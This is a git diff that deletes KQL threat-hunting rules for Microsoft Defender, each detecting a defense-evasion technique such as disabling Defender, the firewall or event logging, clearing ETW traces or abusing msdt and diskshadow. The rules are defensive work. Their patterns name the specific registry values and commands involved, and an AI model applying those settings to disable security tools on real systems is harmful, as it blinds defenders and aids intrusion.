Evasion/Diagnostic_Library_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql deleted file mode 100644 index cbf97ca4..00000000 --- a/Defense Evasion/Diagnostic_Library_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Greg (rule) -// Date: 2022/06/17 -// Level: high -// Description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library -// Tags: attack.defense_evasion, attack.t1202, cve.2022.30190 -DeviceImageLoadEvents -| where FolderPath endswith "\\sdiageng.dll" and InitiatingProcessFolderPath endswith "\\msdt.exe" \ No newline at end of file diff --git a/Defense Evasion/Directory_Removal_Via_Rmdir.kql b/Defense Evasion/Directory_Removal_Via_Rmdir.kql deleted file mode 100644 index 84822f3c..00000000 --- a/Defense Evasion/Directory_Removal_Via_Rmdir.kql +++ /dev/null @@ -1,11 +0,0 @@ -// Author: frack113 -// Date: 2022/01/15 -// Level: low -// Description: Detects execution of the builtin "rmdir" command in order to delete directories. -Adversaries may delete files left behind by the actions of their intrusion activity. -Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. -Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. - -// Tags: attack.defense_evasion, attack.t1070.004 -DeviceProcessEvents -| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "/q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and ProcessCommandLine contains "rmdir" \ No newline at end of file diff --git a/Defense Evasion/Disable_Administrative_Share_Creation_at_Startup.kql b/Defense Evasion/Disable_Administrative_Share_Creation_at_Startup.kql deleted file mode 100644 index 2dafc2c6..00000000 --- a/Defense Evasion/Disable_Administrative_Share_Creation_at_Startup.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/16 -// Level: medium -// Description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system -// Tags: attack.defense_evasion, attack.t1070.005 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Services\\LanmanServer\\Parameters" and (RegistryKey endswith "\\AutoShareWks" or RegistryKey endswith "\\AutoShareServer") \ No newline at end of file diff --git a/Defense Evasion/Disable_Exploit_Guard_Network_Protection_on_Windows_Defender.kql b/Defense Evasion/Disable_Exploit_Guard_Network_Protection_on_Windows_Defender.kql deleted file mode 100644 index 2be410f2..00000000 --- a/Defense Evasion/Disable_Exploit_Guard_Network_Protection_on_Windows_Defender.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Austin Songer @austinsonger -// Date: 2021/08/04 -// Level: medium -// Description: Detects disabling Windows Defender Exploit Guard Network Protection -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (00000001)" and RegistryKey contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride" \ No newline at end of file diff --git a/Defense Evasion/Disable_Internal_Tools_or_Feature_in_Registry.kql b/Defense Evasion/Disable_Internal_Tools_or_Feature_in_Registry.kql deleted file mode 100644 index bcf1f3ec..00000000 --- a/Defense Evasion/Disable_Internal_Tools_or_Feature_in_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec -// Date: 2022/03/18 -// Level: medium -// Description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique) -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\Storage\\Write Protection" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\StorageDevicePolicies\\WriteProtect")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\StartMenuLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskmgr" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispBackgroundPage" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispCPL" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer\\DisableNotificationCenter" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD")) \ No newline at end of file diff --git a/Defense Evasion/Disable_Macro_Runtime_Scan_Scope.kql b/Defense Evasion/Disable_Macro_Runtime_Scan_Scope.kql deleted file mode 100644 index 98361323..00000000 --- a/Defense Evasion/Disable_Macro_Runtime_Scan_Scope.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/25 -// Level: high -// Description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros -// Tags: attack.defense_evasion -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\SOFTWARE" and RegistryKey contains "\\Microsoft\\Office" and RegistryKey contains "\\Common\\Security") and RegistryKey endswith "\\MacroRuntimeScanScope" \ No newline at end of file diff --git a/Defense Evasion/Disable_Microsoft_Defender_Firewall_via_Registry.kql b/Defense Evasion/Disable_Microsoft_Defender_Firewall_via_Registry.kql deleted file mode 100644 index ae0316e9..00000000 --- a/Defense Evasion/Disable_Microsoft_Defender_Firewall_via_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/09 -// Level: medium -// Description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage -// Tags: attack.defense_evasion, attack.t1562.004 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Services\\SharedAccess\\Parameters\\FirewallPolicy" and RegistryKey endswith "\\EnableFirewall" \ No newline at end of file diff --git a/Defense Evasion/Disable_PUA_Protection_on_Windows_Defender.kql b/Defense Evasion/Disable_PUA_Protection_on_Windows_Defender.kql deleted file mode 100644 index 4c0fde0f..00000000 --- a/Defense Evasion/Disable_PUA_Protection_on_Windows_Defender.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Austin Songer @austinsonger -// Date: 2021/08/04 -// Level: high -// Description: Detects disabling Windows Defender PUA protection -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Policies\\Microsoft\\Windows Defender\\PUAProtection" \ No newline at end of file diff --git a/Defense Evasion/Disable_Privacy_Settings_Experience_in_Registry.kql b/Defense Evasion/Disable_Privacy_Settings_Experience_in_Registry.kql deleted file mode 100644 index 15e206f6..00000000 --- a/Defense Evasion/Disable_Privacy_Settings_Experience_in_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/10/02 -// Level: medium -// Description: Detects registry modifications that disable Privacy Settings Experience -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows\\OOBE\\DisablePrivacyExperience" \ No newline at end of file diff --git a/Defense Evasion/Disable_Tamper_Protection_on_Windows_Defender.kql b/Defense Evasion/Disable_Tamper_Protection_on_Windows_Defender.kql deleted file mode 100644 index d1499c8c..00000000 --- a/Defense Evasion/Disable_Tamper_Protection_on_Windows_Defender.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Austin Songer @austinsonger -// Date: 2021/08/04 -// Level: medium -// Description: Detects disabling Windows Defender Tamper Protection -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows Defender\\Features\\TamperProtection") and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Disable_Windows_Defender_AV_Security_Monitoring.kql b/Defense Evasion/Disable_Windows_Defender_AV_Security_Monitoring.kql deleted file mode 100644 index 179a8de2..00000000 --- a/Defense Evasion/Disable_Windows_Defender_AV_Security_Monitoring.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: ok @securonix invrep-de, oscd.community, frack113 -// Date: 2020/10/12 -// Level: high -// Description: Detects attackers attempting to disable Windows Defender using Powershell -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "-DisableBehaviorMonitoring $true" or ProcessCommandLine contains "-DisableRuntimeMonitoring $true")) or ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "WinDefend") or (ProcessCommandLine contains "config" and ProcessCommandLine contains "WinDefend" and ProcessCommandLine contains "start=disabled") or (ProcessCommandLine contains "stop" and ProcessCommandLine contains "WinDefend"))) \ No newline at end of file diff --git a/Defense Evasion/Disable_Windows_Defender_Functionalities_Via_Registry_Keys.kql b/Defense Evasion/Disable_Windows_Defender_Functionalities_Via_Registry_Keys.kql deleted file mode 100644 index ec388f50..00000000 --- a/Defense Evasion/Disable_Windows_Defender_Functionalities_Via_Registry_Keys.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel -// Date: 2022/08/01 -// Level: high -// Description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows Defender" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\App and Browser protection\\DisallowExploitProtectionOverride" or RegistryKey endswith "\\Features\\TamperProtection" or RegistryKey endswith "\\MpEngine\\MpEnablePus" or RegistryKey endswith "\\PUAProtection" or RegistryKey endswith "\\Signature Update\\ForceUpdateFromMU" or RegistryKey endswith "\\SpyNet\\SpynetReporting" or RegistryKey endswith "\\SpyNet\\SubmitSamplesConsent" or RegistryKey endswith "\\Windows Defender Exploit Guard\\Controlled Folder Access\\EnableControlledFolderAccess")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAntiSpyware" or RegistryKey endswith "\\DisableAntiVirus" or RegistryKey endswith "\\Real-Time Protection\\DisableBehaviorMonitoring" or RegistryKey endswith "\\Real-Time Protection\\DisableIntrusionPreventionSystem" or RegistryKey endswith "\\Real-Time Protection\\DisableIOAVProtection" or RegistryKey endswith "\\Real-Time Protection\\DisableOnAccessProtection" or RegistryKey endswith "\\Real-Time Protection\\DisableRealtimeMonitoring" or RegistryKey endswith "\\Real-Time Protection\\DisableScanOnRealtimeEnable" or RegistryKey endswith "\\Real-Time Protection\\DisableScriptScanning" or RegistryKey endswith "\\Reporting\\DisableEnhancedNotifications" or RegistryKey endswith "\\SpyNet\\DisableBlockAtFirstSeen"))) \ No newline at end of file diff --git a/Defense Evasion/Disable_Windows_Event_Logging_Via_Registry.kql b/Defense Evasion/Disable_Windows_Event_Logging_Via_Registry.kql deleted file mode 100644 index d51c9399..00000000 --- a/Defense Evasion/Disable_Windows_Event_Logging_Via_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/04 -// Level: high -// Description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel -// Tags: attack.defense_evasion, attack.t1562.002 -DeviceRegistryEvents -| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels" and RegistryKey endswith "\\Enabled") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\winsxs\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-FileInfoMinifilter" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-ASN1" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Kernel-AppCompat" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Runtime\\Error" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-CAPI2/Operational")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Compat-Appraiser") or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) \ No newline at end of file diff --git a/Defense Evasion/Disable_Windows_Firewall_by_Registry.kql b/Defense Evasion/Disable_Windows_Firewall_by_Registry.kql deleted file mode 100644 index 5a8e047e..00000000 --- a/Defense Evasion/Disable_Windows_Firewall_by_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/08/19 -// Level: medium -// Description: Detect set EnableFirewall to 0 to disable the Windows firewall -// Tags: attack.defense_evasion, attack.t1562.004 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile\\EnableFirewall" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile\\EnableFirewall") \ No newline at end of file diff --git a/Defense Evasion/Disable_Windows_IIS_HTTP_Logging.kql b/Defense Evasion/Disable_Windows_IIS_HTTP_Logging.kql deleted file mode 100644 index 2e239422..00000000 --- a/Defense Evasion/Disable_Windows_IIS_HTTP_Logging.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/09 -// Level: high -// Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union) -// Tags: attack.defense_evasion, attack.t1562.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:httplogging" and ProcessCommandLine contains "dontLog:true") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe") \ No newline at end of file diff --git a/Defense Evasion/Disable_Windows_Security_Center_Notifications.kql b/Defense Evasion/Disable_Windows_Security_Center_Notifications.kql deleted file mode 100644 index 530809c4..00000000 --- a/Defense Evasion/Disable_Windows_Security_Center_Notifications.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/08/19 -// Level: medium -// Description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience" \ No newline at end of file diff --git a/Defense Evasion/Disable_of_ETW_Trace.kql b/Defense Evasion/Disable_of_ETW_Trace.kql deleted file mode 100644 index 9ce3bb23..00000000 --- a/Defense Evasion/Disable_of_ETW_Trace.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community -// Date: 2019/03/22 -// Level: high -// Description: Detects a command that clears or disables any ETW trace log which could indicate a logging evasion. -// Tags: attack.defense_evasion, attack.t1070, attack.t1562.006, car.2016-04-002 -DeviceProcessEvents -| where (ProcessCommandLine contains "cl" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "clear-log" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "sl" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "set-log" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "logman" and ProcessCommandLine contains "update" and ProcessCommandLine contains "trace" and ProcessCommandLine contains "--p" and ProcessCommandLine contains "-ets") or ProcessCommandLine contains "Remove-EtwTraceProvider" or (ProcessCommandLine contains "Set-EtwTraceProvider" and ProcessCommandLine contains "0x11") \ No newline at end of file diff --git a/Defense Evasion/Disabled_IE_Security_Features.kql b/Defense Evasion/Disabled_IE_Security_Features.kql deleted file mode 100644 index a947916f..00000000 --- a/Defense Evasion/Disabled_IE_Security_Features.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2020/06/19 -// Level: high -// Description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " -name IEHarden " and ProcessCommandLine contains " -value 0 ") or (ProcessCommandLine contains " -name DEPOff " and ProcessCommandLine contains " -value 1 ") or (ProcessCommandLine contains " -name DisableFirstRunCustomize " and ProcessCommandLine contains " -value 2 ") \ No newline at end of file diff --git a/Defense Evasion/Disabled_Volume_Snapshots.kql b/Defense Evasion/Disabled_Volume_Snapshots.kql deleted file mode 100644 index 4531559c..00000000 --- a/Defense Evasion/Disabled_Volume_Snapshots.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/01/28 -// Level: high -// Description: Detects commands that temporarily turn off Volume Snapshots -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ProcessCommandLine contains "\\Services\\VSS\\Diag" and ProcessCommandLine contains "/d Disabled" \ No newline at end of file diff --git a/Defense Evasion/Disabled_Windows_Defender_Eventlog.kql b/Defense Evasion/Disabled_Windows_Defender_Eventlog.kql deleted file mode 100644 index a8f2a083..00000000 --- a/Defense Evasion/Disabled_Windows_Defender_Eventlog.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/07/04 -// Level: high -// Description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Windows Defender/Operational\\Enabled" \ No newline at end of file diff --git a/Defense Evasion/Diskshadow_Script_Mode_-_Execution_From_Potential_Suspicious_Location.kql b/Defense Evasion/Diskshadow_Script_Mode_-_Execution_From_Potential_Suspicious_Location.kql deleted file mode 100644 index 9f443b1a..00000000 --- a/Defense Evasion/Diskshadow_Script_Mode_-_Execution_From_Potential_Suspicious_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/09/15 -// Level: medium -// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Users\\Public\\") \ No newline at end of file diff --git a/Defense Evasion/Diskshadow_Script_Mode_-_Uncommon_Script_Extension_Execution.kql b/Defense Evasion/Diskshadow_Script_Mode_-_Uncommon_Script_Extension_Execution.kql deleted file mode 100644 index a628f79d..00000000 --- a/Defense Evasion/Diskshadow_Script_Mode_-_Uncommon_Script_Extension_Execution.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/09/15 -// Level: medium -// Description: Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. -Initial baselining of the allowed extension list is required. - -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe")) and (not(ProcessCommandLine contains ".txt")) \ No newline at end of file diff --git a/Defense Evasion/Dism_Remove_Online_Package.kql b/Defense Evasion/Dism_Remove_Online_Package.kql deleted file mode 100644 index 78d6b348..00000000 --- a/Defense Evasion/Dism_Remove_Online_Package.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/16 -// Level: medium -// Description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "/Online" and ProcessCommandLine contains "/Disable-Feature") and FolderPath endswith "\\Dism.exe") or (FolderPath endswith "\\DismHost.exe" and (InitiatingProcessCommandLine contains "/Online" and InitiatingProcessCommandLine contains "/Disable-Feature")) \ No newline at end of file diff --git a/Defense Evasion/Displaying_Hidden_Files_Feature_Disabled.kql b/Defense Evasion/Displaying_Hidden_Files_Feature_Disabled.kql deleted file mode 100644 index 62698c93..00000000 --- a/Defense Evasion/Displaying_Hidden_Files_Feature_Disabled.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/04/02 -// Level: medium -// Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. -This technique is abused by several malware families to hide their files from normal users. - -// Tags: attack.defense_evasion, attack.t1564.001 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden") \ No newline at end of file diff --git a/Defense Evasion/DllUnregisterServer_Function_Call_Via_Msiexec.EXE.kql b/Defense Evasion/DllUnregisterServer_Function_Call_Via_Msiexec.EXE.kql deleted file mode 100644 index cf74575e..00000000 --- a/Defense Evasion/DllUnregisterServer_Function_Call_Via_Msiexec.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/04/24 -// Level: medium -// Description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function -// Tags: attack.defense_evasion, attack.t1218.007 -DeviceProcessEvents -| where ProcessCommandLine contains ".dll" and (ProcessCommandLine contains " -z " or ProcessCommandLine contains " /z ") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe") \ No newline at end of file diff --git a/Defense Evasion/Dllhost.EXE_Execution_Anomaly.kql b/Defense Evasion/Dllhost.EXE_Execution_Anomaly.kql deleted file mode 100644 index e3208d89..00000000 --- a/Defense Evasion/Dllhost.EXE_Execution_Anomaly.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/27 -// Level: high -// Description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes. -// Tags: attack.defense_evasion, attack.t1055 -DeviceProcessEvents -| where ((ProcessCommandLine in~ ("dllhost.exe", "dllhost")) and FolderPath endswith "\\dllhost.exe") and (not(isnull(ProcessCommandLine))) \ No newline at end of file diff --git a/Defense Evasion/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql b/Defense Evasion/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql deleted file mode 100644 index 4a2e8091..00000000 --- a/Defense Evasion/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: bartblaze -// Date: 2020/07/13 -// Level: medium -// Description: Detects dllhost initiating a network connection to a non-local IP address. -Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. -An initial baseline is recommended before deployment. - -// Tags: attack.defense_evasion, attack.t1218, attack.execution, attack.t1559.001 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\dllhost.exe" and (not(((ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "fc00::/7") or ipv4_is_in_range(RemoteIP, "fe80::/10")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24"))))) \ No newline at end of file diff --git a/Defense Evasion/Drop_Binaries_Into_Spool_Drivers_Color_Folder.kql b/Defense Evasion/Drop_Binaries_Into_Spool_Drivers_Color_Folder.kql deleted file mode 100644 index 8c857cd9..00000000 --- a/Defense Evasion/Drop_Binaries_Into_Spool_Drivers_Color_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/28 -// Level: medium -// Description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below -// Tags: attack.defense_evasion -DeviceFileEvents -| where (FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".sys") and FolderPath startswith "C:\\Windows\\System32\\spool\\drivers\\color\\" \ No newline at end of file diff --git a/Defense Evasion/DumpMinitool_Execution.kql b/Defense Evasion/DumpMinitool_Execution.kql deleted file mode 100644 index f7f7fd6a..00000000 --- a/Defense Evasion/DumpMinitool_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2022/04/06 -// Level: medium -// Description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump" -// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe"))) \ No newline at end of file diff --git a/Defense Evasion/DumpStack.log_Defender_Evasion.kql b/Defense Evasion/DumpStack.log_Defender_Evasion.kql deleted file mode 100644 index a0a25999..00000000 --- a/Defense Evasion/DumpStack.log_Defender_Evasion.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/06 -// Level: critical -// Description: Detects the use of the filename DumpStack.log to evade Microsoft Defender -// Tags: attack.defense_evasion -DeviceProcessEvents -| where FolderPath endswith "\\DumpStack.log" or ProcessCommandLine contains " -o DumpStack.log" \ No newline at end of file diff --git a/Defense Evasion/Dynamic_.NET_Compilation_Via_Csc.EXE.kql b/Defense Evasion/Dynamic_.NET_Compilation_Via_Csc.EXE.kql deleted file mode 100644 index ce4a9118..00000000 --- a/Defense Evasion/Dynamic_.NET_Compilation_Via_Csc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2019/08/24 -// Level: medium -// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile 